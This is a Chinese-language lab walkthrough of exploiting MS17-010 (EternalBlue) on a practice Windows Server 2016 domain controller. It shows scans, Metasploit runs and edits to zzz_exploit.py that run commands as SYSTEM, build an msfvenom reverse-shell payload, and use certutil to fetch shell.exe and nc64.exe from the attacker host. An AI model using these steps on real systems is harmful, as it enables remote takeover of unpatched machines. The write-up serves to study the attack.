Zero

需要改脚本执行配置的永恒之蓝漏洞靶场。。。。

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/zero]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.10.100:53
Open 192.168.10.100:88
Open 192.168.10.100:135
Open 192.168.10.100:139
Open 192.168.10.100:389
Open 192.168.10.100:445
Open 192.168.10.100:464
Open 192.168.10.100:593
Open 192.168.10.100:636
Open 192.168.10.100:3268
Open 192.168.10.100:5985
Open 192.168.10.100:9389
Open 192.168.10.100:49667
Open 192.168.10.100:49668
Open 192.168.10.100:49669
Open 192.168.10.100:49670
Open 192.168.10.100:49685
Open 192.168.10.100:49710

漏洞利用

msf脚本利用

无web渗透，但是开放了445端口服务，尝试探索一下：

┌──(kali💀kali)-[~/temp/zero]
└─$ msfconsole -q
msf6 > search ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .

Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                            Required  Description
   ----         ---------------                                            --------  -----------
   CHECK_ARCH   true                                                       no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                       no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                      no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipe  yes       List of named pipes to check
                s.txt
   RHOSTS                                                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        445                                                        yes       The SMB service port (TCP)
   SMBDomain    .                                                          no        The Windows domain to use for authentication
   SMBPass                                                                 no        The password for the specified username
   SMBUser                                                                 no        The username to authenticate as
   THREADS      1                                                          yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.100
rhosts => 192.168.10.100
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.10.100:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.10.100:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
                                             chines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
                                             es.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.100
rhosts => 192.168.10.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.104
lhost => 192.168.10.104
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.10.104:4444 
[*] 192.168.10.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.100:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.10.100:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.100:445 - The target is vulnerable.
[*] 192.168.10.100:445 - Connecting to target for exploitation.
[+] 192.168.10.100:445 - Connection established for exploitation.
[+] 192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.10.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.10.100:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.10.100:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.100:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.100:445 - Starting non-paged pool grooming
[+] 192.168.10.100:445 - Sending SMBv2 buffers
[+] 192.168.10.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.100:445 - Sending final SMBv2 buffers.
[*] 192.168.10.100:445 - Sending last fragment of exploit packet!
[*] 192.168.10.100:445 - Receiving response from exploit packet
[+] 192.168.10.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.100:445 - Sending egg to corrupted connection.
[*] 192.168.10.100:445 - Triggering free of corrupted buffer.
[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.10.100:445 - Connecting to target for exploitation.
[+] 192.168.10.100:445 - Connection established for exploitation.
[+] 192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.10.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.10.100:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.10.100:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.100:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet
^C[-] 192.168.10.100:445 - Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                       Required  Description
   ----                  ---------------                                       --------  -----------
   DBGTRACE              false                                                 yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                    yes       How many times to try to leak transaction
   NAMEDPIPE                                                                   no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named  yes       List of named pipes to check
                         _pipes.txt
   RHOSTS                                                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                                                                         html
   RPORT                 445                                                   yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                         no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                        no        The service display name
   SERVICE_NAME                                                                no        The service name
   SHARE                 ADMIN$                                                yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                     no        The Windows domain to use for authentication
   SMBPass                                                                     no        The password for the specified username
   SMBUser                                                                     no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.10.100
rhosts => 192.168.10.100
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.10.104
lhost => 192.168.10.104
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 192.168.10.104:4444 
[*] 192.168.10.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.10.100:445 - Built a write-what-where primitive...
[+] 192.168.10.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.10.100:445 - Selecting PowerShell target
[*] 192.168.10.100:445 - Executing the payload...
[+] 192.168.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

重新扫描一下相关配置：

┌──(kali💀kali)-[~/temp/zero/AutoBlue-MS17-010]
└─$ nmap -Pn $IP 445 -sC -sV -sT -T4 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 04:17 EDT
Nmap scan report for 192.168.10.100
Host is up (0.0034s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 23:18:01Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: DC01
|   NetBIOS computer name: DC01\x00
|   Domain name: zero.hmv
|   Forest name: zero.hmv
|   FQDN: DC01.zero.hmv
|_  System time: 2024-08-10T16:18:02-07:00
|_clock-skew: mean: 17h20m01s, deviation: 4h02m29s, median: 15h00m00s
| smb2-time: 
|   date: 2024-08-10T23:18:02
|_  start_date: 2024-08-10T21:41:37
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:15:ea:1c (Oracle VirtualBox virtual NIC)

Nmap scan report for 445 (0.0.1.189)
Host is up.
All 1000 scanned ports on 445 (0.0.1.189) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 67.52 seconds

发现存在一个域名解析，修改相关配置，重新进行利用，还是不行。。。尝试网上的其他脚本：

https://github.com/3ndG4me/AutoBlue-MS17-010

┌──(kali💀kali)-[~/temp/zero/AutoBlue-MS17-010]
└─$ ls -la
total 200
drwxr-xr-x 4 kali kali  4096 Aug 10 04:16 .
drwxr-xr-x 3 kali kali  4096 Aug 10 04:07 ..
-rwxr-xr-x 1 kali kali 26444 Aug 10 04:07 eternalblue_exploit10.py
-rwxr-xr-x 1 kali kali 25741 Aug 10 04:07 eternalblue_exploit7.py
-rwxr-xr-x 1 kali kali 24106 Aug 10 04:07 eternalblue_exploit8.py
-rwxr-xr-x 1 kali kali  2801 Aug 10 04:07 eternal_checker.py
-rwxr-xr-x 1 kali kali  1070 Aug 10 04:07 LICENSE
-rwxr-xr-x 1 kali kali  3640 Aug 10 04:07 listener_prep.sh
-rwxr-xr-x 1 kali kali 25943 Aug 10 04:07 mysmb.py
drwxr-xr-x 2 kali kali  4096 Aug 10 04:07 __pycache__
-rwxr-xr-x 1 kali kali  5352 Aug 10 04:07 README.md
-rwxr-xr-x 1 kali kali     8 Aug 10 04:07 requirements.txt
drwxr-xr-x 2 kali kali  4096 Aug 10 04:13 shellcode
-rwxr-xr-x 1 kali kali 49249 Aug 10 04:07 zzz_exploit.py

┌──(kali💀kali)-[~/temp/zero/AutoBlue-MS17-010]
└─$ python3 eternal_checker.py 192.168.10.100
[*] Target OS: Windows Server 2016 Standard Evaluation 14393
[!] The target is not patched
=== Testing named pipes ===
[+] Found pipe 'netlogon'
[+] Found pipe 'lsarpc'
[+] Found pipe 'samr'
[*] Done

然后按照README.md尝试了接下来的操作，但是没有弹回来，不知道是不是哪里搞错了。

脚本修改利用

windows做的少，只能跟着wp做了，尝试去这个库的源仓库看看：https://github.com/worawit/MS17-010

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 checker.py 192.168.10.100
Traceback (most recent call last):
  File "checker.py", line 1, in <module>
    from mysmb import MYSMB
  File "/home/kali/temp/zero/MS17-010/mysmb.py", line 3, in <module>
    from impacket import smb, smbconnection
ImportError: No module named impacket

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 -m pip install impacket==0.9.20

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 checker.py 192.168.10.100      
Target OS: Windows Server 2016 Standard Evaluation 14393
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_ACCESS_DENIED

修改掉相关特征，尝试进行利用：

def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        print('creating file c:\\pwned.txt on the target')
        tid2 = smbConn.connectTree('C$')
        fid2 = smbConn.createFile(tid2, '/pwned.txt')
        smbConn.closeFile(tid2, fid2)
        smbConn.disconnectTree(tid2)

        #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

修改为：

def smb_pwn(conn, arch):
        # smbConn = conn.get_smbconnection()

        # print('creating file c:\\pwned.txt on the target')
        # tid2 = smbConn.connectTree('C$')
        # fid2 = smbConn.createFile(tid2, '/pwned.txt')
        # smbConn.closeFile(tid2, fid2)
        # smbConn.disconnectTree(tid2)

        # smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
        service_exec(conn, r'cmd /c ping 192.168.10.104')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

尝试执行，看一下能否接收到ping：

# kali1
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ cp zzz_exploit.py zzz_exploit_change.py

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ vim zzz_exploit_change.py

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ chmod +x *

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 zzz_exploit_change.py 192.168.10.100
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: netlogon
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffc407182b8910
SESSION: 0xffffb406737d6450
FLINK: 0xffffb406750a2098
InParam: 0xffffb4067509616c
MID: 0x2903
unexpected alignment, diff: 0xb098
leak failed... try again
CONNECTION: 0xffffc407182b8910
SESSION: 0xffffb406737d6450
FLINK: 0xffffb406750b1098
InParam: 0xffffb406750ab16c
MID: 0x2903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 192.168.10.100.....
Creating service gFLX.....
Starting service gFLX.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service gFLX.....
Done

# kali2
┌──(kali💀kali)-[~/temp/zero]
└─$ sudo tcpdump -i eth1 host 192.168.10.100
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
06:17:05.809879 IP 192.168.10.100 > 224.0.0.252: igmp v2 report 224.0.0.252
06:17:06.321587 IP 192.168.10.100 > 224.0.0.251: igmp v2 report 224.0.0.251
06:17:15.222515 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [S], seq 2544194393, win 32120, options [mss 1460,sackOK,TS val 3299061392 ecr 0,nop,wscale 7], length 0
06:17:15.223170 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [S.], seq 2916466824, ack 2544194394, win 8192, options [mss 1460,nop,wscale 8,sackOK,TS val 6384526 ecr 3299061392], length 0
06:17:15.223189 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [.], ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 0
06:17:15.223537 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 1:52, ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 51
06:17:15.224395 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 1:210, ack 52, win 2081, options [nop,nop,TS val 6384527 ecr 3299061393], length 209
06:17:15.224409 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [.], ack 210, win 250, options [nop,nop,TS val 3299061394 ecr 6384527], length 0
06:17:15.225756 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 52:192, ack 210, win 250, options [nop,nop,TS val 3299061395 ecr 6384527], length 140
06:17:15.226811 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 210:552, ack 192, win 2080, options [nop,nop,TS val 6384529 ecr 3299061395], length 342
06:17:15.229722 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 192:355, ack 552, win 249, options [nop,nop,TS val 3299061399 ecr 6384529], length 163
06:17:15.231001 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 552:698, ack 355, win 2080, options [nop,nop,TS val 6384533 ecr 3299061399], length 146
06:17:15.232466 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 355:431, ack 698, win 249, options [nop,nop,TS val 3299061402 ecr 6384533], length 76
06:17:15.233213 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 698:748, ack 431, win 2080, options [nop,nop,TS val 6384536 ecr 3299061402], length 50
06:17:15.234234 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 431:526, ack 748, win 249, options [nop,nop,TS val 3299061404 ecr 6384536], length 95
06:17:15.234880 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 748:787, ack 526, win 2079, options [nop,nop,TS val 6384537 ecr 3299061404], length 39
06:17:15.236117 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 526:621, ack 787, win 249, options [nop,nop,TS val 3299061405 ecr 6384537], length 95
................

说明可以正常执行命令，尝试修改进行反弹shell。

def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # print('creating file c:\\pwned.txt on the target')
        # tid2 = smbConn.connectTree('C$')
        # fid2 = smbConn.createFile(tid2, '/pwned.txt')
        # smbConn.closeFile(tid2, fid2)
        # smbConn.disconnectTree(tid2)

        smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe') 
        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
        service_exec(conn, r'cmd /c c:\\system.exe')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

然后生成一个shell.exe：

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.104  LPORT=1234 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

尝试执行：

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 zzz_exploit_change.py 192.168.10.100
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: netlogon
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffc4071a296020
SESSION: 0xffffb4067522e790
FLINK: 0xffffb406750a2098
InParam: 0xffffb4067509616c
MID: 0x3a03
unexpected alignment, diff: 0xb098
leak failed... try again
CONNECTION: 0xffffc4071a296020
SESSION: 0xffffb4067522e790
FLINK: 0xffffb406750b1098
InParam: 0xffffb406750ab16c
MID: 0x3a03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 192.168.10.100.....
Creating service benf.....
Starting service benf.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service benf.....
Done

发现弹不过来。。。。。不使用默认的试试：

certutil -a -urlcache -gmt -split -f http://192.168.10.104:8888/shell.exe c:\\windows\\temp\\shell.exe

-a 处理非证书数据

-f 覆盖现有文件。

-split 保存到文件。

-URLCache 显示或删除URL缓存条目。

def smb_pwn(conn, arch):
        # smbConn = conn.get_smbconnection()

        # print('creating file c:\\pwned.txt on the target')
        # tid2 = smbConn.connectTree('C$')
        # fid2 = smbConn.createFile(tid2, '/pwned.txt')
        # smbConn.closeFile(tid2, fid2)
        # smbConn.disconnectTree(tid2)

        # smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe') 
        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
        service_exec(conn, r'cmd /c certutil -a -urlcache -gmt -split -f http://192.168.10.104:8888/shell.exe c:\\windows\\temp\\shell.exe')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

然后改一个配置选项，就是check选的，哪个都行，这里随便弄了一个：

samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)

结果又发生了报错：

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 zzz_exploit_change.py 192.168.10.100 netlogon
Target OS: Windows Server 2016 Standard Evaluation 14393
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffc407182ba020
SESSION: 0xffffb406745019d0
FLINK: 0xffffb406750ab098
InParam: 0xffffb406750a216c
MID: 0x2b03
unexpected alignment, diff: 0x8098
leak failed... try again
CONNECTION: 0xffffc407182ba020
SESSION: 0xffffb406745019d0
FLINK: 0xffffb406750b7098
InParam: 0xffffb406750b116c
MID: 0x2b03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 192.168.10.100.....
Creating service JygC.....
Starting service JygC.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service JygC.....
Done

同时另一边python的http.server也没接到请求。。。。。。可能是因为吃了个饭？重启靶机！还是不行，尝试修改配置选项：

def smb_pwn(conn, arch):
        # smbConn = conn.get_smbconnection()

        # print('creating file c:\\pwned.txt on the target')
        # tid2 = smbConn.connectTree('C$')
        # fid2 = smbConn.createFile(tid2, '/pwned.txt')
        # smbConn.closeFile(tid2, fid2)
        # smbConn.disconnectTree(tid2)

        # smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe') 
        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
        service_exec(conn, r'cmd /c certutil -urlcache -gmt -split -f http://192.168.10.104:8888/shell.exe c:\\windows\\temp\\shell.exe')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

这次成功了，不要-a：

然后尝试执行一下：

def smb_pwn(conn, arch):
        # smbConn = conn.get_smbconnection()

        # print('creating file c:\\pwned.txt on the target')
        # tid2 = smbConn.connectTree('C$')
        # fid2 = smbConn.createFile(tid2, '/pwned.txt')
        # smbConn.closeFile(tid2, fid2)
        # smbConn.disconnectTree(tid2)

        # smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe') 
        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
        service_exec(conn, r'cmd /c c:\\windows\\temp\\shell.exe')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

拉倒，还是不行，老老实实的传nc吧：

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe 
--2024-08-10 07:58:22--  https://github.com/int0x33/nc.exe/blob/master/nc64.exe
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘nc64.exe’

nc64.exe                                            [  <=>                                                                                                ] 285.33K  1.39MB/s    in 0.2s    

2024-08-10 07:58:23 (1.39 MB/s) - ‘nc64.exe’ saved [292179]

┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ chmod +x *

上传,，反弹shell：

service_exec(conn, r'cmd /c certutil -urlcache -gmt -split -f http://192.168.10.104:8888/nc64.exe c:\\windows\\temp\\nc64.exe')
